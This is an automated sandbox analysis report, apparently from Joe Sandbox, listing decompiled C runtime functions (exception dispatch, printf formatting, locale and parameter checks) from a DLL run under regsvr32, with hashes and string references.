                                                      • Instruction Fuzzy Hash: D441F136A08905C5EB70CB1DE98173D73E0F799B49F204225EA9D877B4CB3EE945CA01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 27%
                                                      			E000007FE7FEF9D33CC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                      				long long _v16;
                                                      				long long _v24;
                                                      				intOrPtr _v32;
                                                      				long long _v40;
                                                      				long long _v48;
                                                      				intOrPtr _v52;
                                                      				intOrPtr _v56;
                                                      				signed int _v64;
                                                      				long long _v72;
                                                      				char _v80;
                                                      				long long _v88;
                                                      				void* _t135;
                                                      				void* _t145;
                                                      				void* _t147;
                                                      				void* _t148;
                                                      				void* _t149;
                                                      				signed int* _t200;
                                                      				intOrPtr _t206;
                                                      
                                                      				_a32 = __r9;
                                                      				_a24 = __r8;
                                                      				_a16 = __rdx;
                                                      				_a8 = __rcx;
                                                      				0xf9d24000();
                                                      				if ( *((intOrPtr*)(__rax + 0x2c0)) != 0) goto 0xf9d33d6c;
                                                      				if ( *_a8 == 0xe06d7363) goto 0xf9d33d6c;
                                                      				if ( *_a8 != 0x80000029) goto 0xf9d33d2a;
                                                      				if ( *((intOrPtr*)(_a8 + 0x18)) != 0xf) goto 0xf9d33d2a;
                                                      				if ( *((long long*)(_a8 + 0x60)) == 0x19930520) goto 0xf9d33d6c;
                                                      				if ( *_a8 == 0x80000026) goto 0xf9d33d6c;
                                                      				if (( *_a40 & 0x1fffffff) - 0x19930522 < 0) goto 0xf9d33d6c;
                                                      				if ((_a40[9] & 0x00000001) == 0) goto 0xf9d33d6c;
                                                      				goto 0xf9d3409c;
                                                      				if (( *(_a8 + 4) & 0x00000066) == 0) goto 0xf9d33ef3;
                                                      				if (_a40[1] == 0) goto 0xf9d33ee4;
                                                      				if (_a48 != 0) goto 0xf9d33ee4;
                                                      				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33e40;
                                                      				if ( *_a8 != 0x80000026) goto 0xf9d33e40;
                                                      				_v56 = E000007FE7FEF9D33A60(_a24, _a40, _a32,  *((intOrPtr*)(_a24 + 0xf8)));
                                                      				if (_v56 - 0xffffffff < 0) goto 0xf9d33e0a;
                                                      				if (_v56 - _a40[1] >= 0) goto 0xf9d33e0a;
                                                      				goto 0xf9d33e0f;
                                                      				E000007FE7FEF9D2CF80(_a40);
                                                      				r9d = _v56;
                                                      				E000007FE7FEF9D34F20(_a40, _a16, _a32, _a40);
                                                      				goto 0xf9d33ec7;
                                                      				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33ec7;
                                                      				if ( *_a8 != 0x80000029) goto 0xf9d33ec7;
                                                      				_v48 = _a8;
                                                      				_v52 =  *((intOrPtr*)(_v48 + 0x38));
                                                      				if (_v52 - 0xffffffff < 0) goto 0xf9d33e95;
                                                      				if (_v52 - _a40[1] >= 0) goto 0xf9d33e95;
                                                      				goto 0xf9d33e9a;
                                                      				E000007FE7FEF9D2CF80(_a40);
                                                      				r9d = _v52;
                                                      				E000007FE7FEF9D34F20(_v48,  *((intOrPtr*)(_v48 + 0x28)), _a32, _a40);
                                                      				goto 0xf9d3409c;
                                                      				E000007FE7FEF9D2E790(_v52 - _a40[1], _v48, _a16, _a32, _a40);
                                                      				goto 0xf9d34097;
                                                      				if (_a40[3] != 0) goto 0xf9d33f59;
                                                      				if (( *_a40 & 0x1fffffff) - 0x19930521 < 0) goto 0xf9d34097;
                                                      				_t200 = _a40;
                                                      				if ( *((intOrPtr*)(_t200 + 0x20)) == 0) goto 0xf9d33f44;
                                                      				_t135 = E000007FE7FEF9D2E680( *_a40 & 0x1fffffff, _t200);
                                                      				_v24 = _t200 + _a40[8];
                                                      				goto 0xf9d33f4d;
                                                      				_v24 = 0;
                                                      				if (_v24 == 0) goto 0xf9d34097;
                                                      				if ( *_a8 != 0xe06d7363) goto 0xf9d34041;
                                                      				if ( *((intOrPtr*)(_a8 + 0x18)) - 3 < 0) goto 0xf9d34041;
                                                      				if ( *((intOrPtr*)(_a8 + 0x20)) - 0x19930522 <= 0) goto 0xf9d34041;
                                                      				_t206 =  *((intOrPtr*)(_a8 + 0x30));
                                                      				if ( *((intOrPtr*)(_t206 + 8)) == 0) goto 0xf9d33fc5;
                                                      				E000007FE7FEF9D2E6A0(_t135, _t206);
                                                      				_v16 = _t206 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 8));
                                                      				goto 0xf9d33fce;
                                                      				_v16 = 0;
                                                      				_v40 = _v16;
                                                      				_t177 = _v40;
                                                      				if (_v40 == 0) goto 0xf9d34041;
                                                      				_v64 = _a64 & 0x000000ff;
                                                      				_v72 = _a56;
                                                      				_v80 = _a48;
                                                      				_v88 = _a40;
                                                      				_v32 = _v40();
                                                      				goto 0xf9d34097;
                                                      				_v64 = _a56;
                                                      				_v72 = _a48;
                                                      				_v80 = _a64 & 0x000000ff;
                                                      				_v88 = _a40;
                                                      				E000007FE7FEF9D340B0(_t145, _t147, _t148, _t149, _t177, _a40, _a8, _a16, _a24, _a32);
                                                      				return 1;
                                                      			}

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _inconsistency
                                                      • String ID: csm$csm
                                                      • API String ID: 32975420-3733052814
                                                      • Opcode ID: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                                      • Instruction ID: 322b6d8969e66d64c69545eab8578d1d9fa1a0c6b52bdd8827c0b0ea251a3b55
                                                      • Opcode Fuzzy Hash: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                                      • Instruction Fuzzy Hash: 12A1EE3660CBC5C6D7B08B15E5447AEB7A0F385B95FA04126EACD87BA9CB3DD844CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c, xrefs: 000007FEF9D29932
                                                      • ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca, xrefs: 000007FEF9D2991D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: __free_lconv_mon__free_lconv_num
                                                      • String ID: ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c
                                                      • API String ID: 2148069796-2706031433
                                                      • Opcode ID: 5530c5148454f32ed92c453347a6e128a1bc42f7b71ac9e6bc1d50a4750a2989
                                                      • Instruction ID: 7353ab124090f0710997c18079ef38eae00693e27689a0bfa21a481d68f00224
                                                      • Opcode Fuzzy Hash: 5530c5148454f32ed92c453347a6e128a1bc42f7b71ac9e6bc1d50a4750a2989
                                                      • Instruction Fuzzy Hash: F4A10E36A18A8581EB908F49E4853BEA3E0F3C4B54F665036EA8E477B5CFBED445C740
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                      • API String ID: 2123368286-3717698799
                                                      • Opcode ID: 1aafbfe16f86ccf21253850ca152cd04a8ee8357f57b5e583563c43112fb4b7a
                                                      • Instruction ID: b28b411edc77ea5f57a42c4ce070c51137fe1cd7001121a3be123fc4e483bd38
                                                      • Opcode Fuzzy Hash: 1aafbfe16f86ccf21253850ca152cd04a8ee8357f57b5e583563c43112fb4b7a
                                                      • Instruction Fuzzy Hash: FC810D32A1DB8686DAB08B29E84476E73E0F385765F204225E6ED437E9DF3DD445CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 20%
                                                      			E000007FE7FEF9D3C719(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                      				signed int _t212;
                                                      				signed char _t217;
                                                      				intOrPtr _t252;
                                                      				signed int _t327;
                                                      				signed int _t328;
                                                      				signed long long _t331;
                                                      				intOrPtr* _t354;
                                                      				signed long long _t379;
                                                      
                                                      				_t327 = __rax;
                                                      				_a708 = 0x27;
                                                      				_a72 = 0x10;
                                                      				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                                      				_a84 = 0x30;
                                                      				_a85 = _a708 + 0x51;
                                                      				_a92 = 2;
                                                      				_a72 = 8;
                                                      				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                                      				asm("bts eax, 0x9");
                                                      				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                                      				E000007FE7FEF9D31EA0( &_a1112);
                                                      				_a824 = _t327;
                                                      				goto 0xf9d3c84b;
                                                      				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                                      				E000007FE7FEF9D31EA0( &_a1112);
                                                      				_a824 = _t327;
                                                      				goto 0xf9d3c84b;
                                                      				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                                      				_t328 = E000007FE7FEF9D31E40( &_a1112);
                                                      				_a824 = _t328;
                                                      				goto 0xf9d3c80e;
                                                      				E000007FE7FEF9D31E40( &_a1112);
                                                      				_a824 = _t328;
                                                      				goto 0xf9d3c84b;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                                      				E000007FE7FEF9D31E40( &_a1112);
                                                      				_a824 = _t328;
                                                      				goto 0xf9d3c84b;
                                                      				E000007FE7FEF9D31E40( &_a1112);
                                                      				_a824 = _t328;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                                      				if (_a824 >= 0) goto 0xf9d3c882;
                                                      				_a832 =  ~_a824;
                                                      				asm("bts eax, 0x8");
                                                      				goto 0xf9d3c892;
                                                      				_t331 = _a824;
                                                      				_a832 = _t331;
                                                      				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                                      				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                                      				_a832 = _a832 & _t331;
                                                      				if (_a116 >= 0) goto 0xf9d3c8d8;
                                                      				_a116 = 1;
                                                      				goto 0xf9d3c8f5;
                                                      				_a80 = _a80 & 0xfffffff7;
                                                      				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                                      				_a116 = 0x200;
                                                      				if (_a832 != 0) goto 0xf9d3c908;
                                                      				_a92 = 0;
                                                      				_a64 =  &_a687;
                                                      				_t212 = _a116;
                                                      				_a116 = _a116 - 1;
                                                      				if (_t212 > 0) goto 0xf9d3c936;
                                                      				if (_a832 == 0) goto 0xf9d3c9d3;
                                                      				_a1040 = _a72;
                                                      				_a816 = _t212 / _a1040 + 0x30;
                                                      				_a1048 = _a72;
                                                      				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                                      				_t217 = _a816 + _a708;
                                                      				_a816 = _t217;
                                                      				 *_a64 = _a816 & 0x000000ff;
                                                      				_a64 = _a64 - 1;
                                                      				goto 0xf9d3c915;
                                                      				_a104 = _t217;
                                                      				_a64 = _a64 + 1;
                                                      				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                                      				if (_a104 == 0) goto 0xf9d3ca12;
                                                      				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                                      				_a64 = _a64 - 1;
                                                      				 *_a64 = 0x30;
                                                      				_a104 = _a104 + 1;
                                                      				if (_a108 != 0) goto 0xf9d3cc6e;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                                      				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                                      				_a84 = 0x2d;
                                                      				_a92 = 1;
                                                      				goto 0xf9d3ca95;
                                                      				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                                      				_a84 = 0x2b;
                                                      				_a92 = 1;
                                                      				goto 0xf9d3ca95;
                                                      				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                                      				_a84 = 0x20;
                                                      				_a92 = 1;
                                                      				_a840 = _a88 - _a104 - _a92;
                                                      				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                                      				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                      				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                      				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                                      				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                                      				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                                      				if (_a76 == 0) goto 0xf9d3cc1d;
                                                      				if (_a104 <= 0) goto 0xf9d3cc1d;
                                                      				_a872 = 0;
                                                      				_a848 = _a64;
                                                      				_a856 = _a104;
                                                      				_a856 = _a856 - 1;
                                                      				if (_a856 == 0) goto 0xf9d3cc1b;
                                                      				_a1056 =  *_a848 & 0x0000ffff;
                                                      				r9d = _a1056 & 0x0000ffff;
                                                      				r8d = 6;
                                                      				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                                      				_a848 =  &(_a848[1]);
                                                      				if (_a872 != 0) goto 0xf9d3cbe5;
                                                      				if (_a860 != 0) goto 0xf9d3cbf2;
                                                      				_a688 = 0xffffffff;
                                                      				goto 0xf9d3cc1b;
                                                      				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                      				goto 0xf9d3cb60;
                                                      				goto 0xf9d3cc3b;
                                                      				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                      				if (_a688 < 0) goto 0xf9d3cc6e;
                                                      				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                                      				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                      				if (_a96 == 0) goto 0xf9d3cc8e;
                                                      				0xf9d25330();
                                                      				_a96 = 0;
                                                      				goto 0xf9d3b99c;
                                                      				if (_a704 == 0) goto 0xf9d3ccb4;
                                                      				if (_a704 == 7) goto 0xf9d3ccb4;
                                                      				_a1060 = 0;
                                                      				goto 0xf9d3ccbf;
                                                      				_a1060 = 1;
                                                      				_t252 = _a1060;
                                                      				_a876 = _t252;
                                                      				if (_a876 != 0) goto 0xf9d3cd05;
                                                      				_t354 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                      				_a32 = _t354;
                                                      				r9d = 0;
                                                      				r8d = 0x8f5;
                                                      				0xf9d2b3b0();
                                                      				if (_t252 != 1) goto 0xf9d3cd05;
                                                      				asm("int3");
                                                      				if (_a876 != 0) goto 0xf9d3cd61;
                                                      				0xf9d2ab30();
                                                      				 *_t354 = 0x16;
                                                      				_a32 = 0;
                                                      				r9d = 0x8f5;
                                                      				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                      				_a912 = 0xffffffff;
                                                      				E000007FE7FEF9D26800( &_a120);
                                                      				goto 0xf9d3cd80;
                                                      				_a916 = _a688;
                                                      				E000007FE7FEF9D26800( &_a120);
                                                      				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t379, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                      			}
                                                      0x7fef9d3cc80
                                                      0x7fef9d3cc85
                                                      0x7fef9d3cc8e
                                                      0x7fef9d3cc9b
                                                      0x7fef9d3cca5
                                                      0x7fef9d3cca7
                                                      0x7fef9d3ccb2
                                                      0x7fef9d3ccb4
                                                      0x7fef9d3ccbf
                                                      0x7fef9d3ccc6
                                                      0x7fef9d3ccd5
                                                      0x7fef9d3ccd7
                                                      0x7fef9d3ccde
                                                      0x7fef9d3cce3
                                                      0x7fef9d3cce6
                                                      0x7fef9d3ccf8
                                                      0x7fef9d3cd00
                                                      0x7fef9d3cd02
                                                      0x7fef9d3cd0d
                                                      0x7fef9d3cd0f
                                                      0x7fef9d3cd14
                                                      0x7fef9d3cd1a
                                                      0x7fef9d3cd23
                                                      0x7fef9d3cd3e
                                                      0x7fef9d3cd43
                                                      0x7fef9d3cd53
                                                      0x7fef9d3cd5f
                                                      0x7fef9d3cd68
                                                      0x7fef9d3cd74
                                                      0x7fef9d3cd97

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: get_int64_arg
                                                      • String ID: '$0$9
                                                      • API String ID: 1967237116-269856862
                                                      • Opcode ID: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                                      • Instruction ID: b3eda79bc04a60fb7ee4a4011f7c31915f3bf9e4e3688118cbdbb277fe6e384d
                                                      • Opcode Fuzzy Hash: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                                      • Instruction Fuzzy Hash: 0D41B47260DAC187E7B58B19E8957AEB7E4F385791F100125EAC886B98DB7DE640CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: Frame$CreateDestroyedExceptionFindInfoObjectUnlink
                                                      • String ID: csm
                                                      • API String ID: 2005287440-1018135373
                                                      • Opcode ID: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                                      • Instruction ID: 0432dbe60f42fc154ce83aeddd16286c3d94edaaa77ff7db33c77853d76fe5a2
                                                      • Opcode Fuzzy Hash: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                                      • Instruction Fuzzy Hash: FB51A836608B8682DAA09B1AF49076E77E0F3C4B91F615125EBCD47BB5DF3AD444CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: FileModuleName__initmbctable
                                                      • String ID: C:\Windows\System32\regsvr32.exe$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdargv.c
                                                      • API String ID: 3548084100-1254873407
                                                      • Opcode ID: d38f4fd9cb9ecdd73cd32345429acc70b773e7a180fa8c1b1693dc69edd9f2e5
                                                      • Instruction ID: 40487cdd99e7390fc7cfa00da240fffb72a0e4e16c6d4a8cb9187a6270b67cf4
                                                      • Opcode Fuzzy Hash: d38f4fd9cb9ecdd73cd32345429acc70b773e7a180fa8c1b1693dc69edd9f2e5
                                                      • Instruction Fuzzy Hash: 09410C21A19A8281EA90CB19EC8136E77A0F7857A5F614626E6EE43BF4DF3ED144C701
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                      • API String ID: 2123368286-3717698799
                                                      • Opcode ID: 65def78894184635a726d36e54dfff1a0241531dd31d36ef72262bf6a1fca492
                                                      • Instruction ID: db9b60f6e9b20c9f37adeee518bf084cd0881f5c38580f5bd04c1ce4cfd39116
                                                      • Opcode Fuzzy Hash: 65def78894184635a726d36e54dfff1a0241531dd31d36ef72262bf6a1fca492
                                                      • Instruction Fuzzy Hash: 49412931E1C7868AEAB08B24E84476E62E0F385365F604335D6ED427E5CB3EE444CB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: CountCriticalFileInitializeSectionSpinType_calloc_dbg_calloc_dbg_impl
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                      • API String ID: 2306298712-3864165772
                                                      • Opcode ID: 6db4822cd77f1ed37bef3fea8eb09d36478b9c501087b185a6ab49f69a42b384
                                                      • Instruction ID: b637de57708ed2c7d115ffe7a667dd769ed1fe34c6e506efeb830bf347bff847
                                                      • Opcode Fuzzy Hash: 6db4822cd77f1ed37bef3fea8eb09d36478b9c501087b185a6ab49f69a42b384
                                                      • Instruction Fuzzy Hash: D8313D32609BC585E7B08B19E84076EB3E1F385764F618225CAED877E4DB3DE405CB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                                      • API String ID: 2123368286-2562677240
                                                      • Opcode ID: dabd10d16ebe11174fc63b9f89b539a3b240949ad9ffb505f617c08bbd3ff20b
                                                      • Instruction ID: c85490607768c44f9eb9442c12c0ad7794bb5914cb74fa2bef1d73063ee62390
                                                      • Opcode Fuzzy Hash: dabd10d16ebe11174fc63b9f89b539a3b240949ad9ffb505f617c08bbd3ff20b
                                                      • Instruction Fuzzy Hash: 67311632A0DB8685EAB09B15E8407AEB7E1F385390F204625D6DD43BE8DB7ED444CB02
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter$__doserrno
                                                      • String ID: (str != NULL)$_fclose_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c
                                                      • API String ID: 1181141450-2845860089
                                                      • Opcode ID: 7bab6b588e6dd2839569b0ca5fa95970036134ebeeb6453b58b8f029525d0fe5
                                                      • Instruction ID: a2d3a4357c877c10dbeba88c1570b3bcf2b7b0db3c51835aaf51b50bd6ce4727
                                                      • Opcode Fuzzy Hash: 7bab6b588e6dd2839569b0ca5fa95970036134ebeeb6453b58b8f029525d0fe5
                                                      • Instruction Fuzzy Hash: 25316D36A28A4286E7909B19E88476E77E0F380794F205125F6CE477F5CB7ED841CF42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_isatty$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isatty.c
                                                      • API String ID: 2123368286-160817255
                                                      • Opcode ID: 20bce409a33f2d52ae5b3246709d5cabe66b407105c41d1953a7685d10f1773e
                                                      • Instruction ID: f81691e69628683e8e3df4f52d5e63bc79cedec177f2501b48199eede19b8a9f
                                                      • Opcode Fuzzy Hash: 20bce409a33f2d52ae5b3246709d5cabe66b407105c41d1953a7685d10f1773e
                                                      • Instruction Fuzzy Hash: 7E218E71B2D6428AE7D89B24EC8476DB3E1F390395F609635E1DE476E4D77ED4018B00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (stream != NULL)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c$fclose
                                                      • API String ID: 2123368286-3409824857
                                                      • Opcode ID: b4902cc461c388e31b4dcd0307079e4da2555ab755984697fa072277fbec1f80
                                                      • Instruction ID: aea6e50ad225ee654e5ba897f2371f9ab8692fab447ee5272478533351973a17
                                                      • Opcode Fuzzy Hash: b4902cc461c388e31b4dcd0307079e4da2555ab755984697fa072277fbec1f80
                                                      • Instruction Fuzzy Hash: 69214C72A2D64286EB909F58E84476EB7E0F380394F605125E6CE47AE4CBBED444CF42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_
                                                      • String ID: (unsigned)(c + 1) <= 256$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isctype.c
                                                      • API String ID: 1901436342-3621827421
                                                      • Opcode ID: 582f87e7669c1111abee6c616077222c15a1b9b573b43815cbd7bd4630f6c99c
                                                      • Instruction ID: b6da7cfe51097e189ae1413993ad3b1820e6f9d9ec5e09c8ec6feaf0c9b902cc
                                                      • Opcode Fuzzy Hash: 582f87e7669c1111abee6c616077222c15a1b9b573b43815cbd7bd4630f6c99c
                                                      • Instruction Fuzzy Hash: 6D210132918A8186E790DB64E8516AEB7E0F7C4780F614122E7CD83AB9DB7DD954CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: ("Invalid error_mode", 0)$_set_error_mode$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\errmode.c
                                                      • API String ID: 2123368286-2972513288
                                                      • Opcode ID: f8745b700fb78b44b2e658b57c518d69726f466f5def5af1cc34e5c73236fe3e
                                                      • Instruction ID: 6381d33894c21e9a570bb340808ef8ba759c91e84b1c9252353dd9e19991e7ba
                                                      • Opcode Fuzzy Hash: f8745b700fb78b44b2e658b57c518d69726f466f5def5af1cc34e5c73236fe3e
                                                      • Instruction Fuzzy Hash: 64211A31E1D242CAE7E08F28EC44B6E72E1F344395F605536A6CA866B4D77EE944CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$string != NULL && sizeInBytes > 0
                                                      • API String ID: 2123368286-367560414
                                                      • Opcode ID: b10b6c40919f833f94f1f9af6a6d465dd1a232ebc9f5396bdae7492d99103452
                                                      • Instruction ID: a1605579a08129191013953cda15cb2ece86ed32ec4905bca1088ce11b277eda
                                                      • Opcode Fuzzy Hash: b10b6c40919f833f94f1f9af6a6d465dd1a232ebc9f5396bdae7492d99103452
                                                      • Instruction Fuzzy Hash: EB114931E0C64A89F7E08B14EC457BE62E0F750385F608525D2DD46AF9CBBEE4888F01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$pwcs != NULL
                                                      • API String ID: 2123368286-2992382544
                                                      • Opcode ID: 4e01e6c780b0bcb150885d639f6c4af62c750d2377cec983ef0e9e7992ea6864
                                                      • Instruction ID: 6b038216fd5801b421c61b74e1935d340daef546a177eff3ea16a7a1b838ed42
                                                      • Opcode Fuzzy Hash: 4e01e6c780b0bcb150885d639f6c4af62c750d2377cec983ef0e9e7992ea6864
                                                      • Instruction Fuzzy Hash: EE112831A08A86D5E7F08B24EC547BE62D0F388355FA0862581DD826E5CF7ED184CB01
                                                      Uniqueness

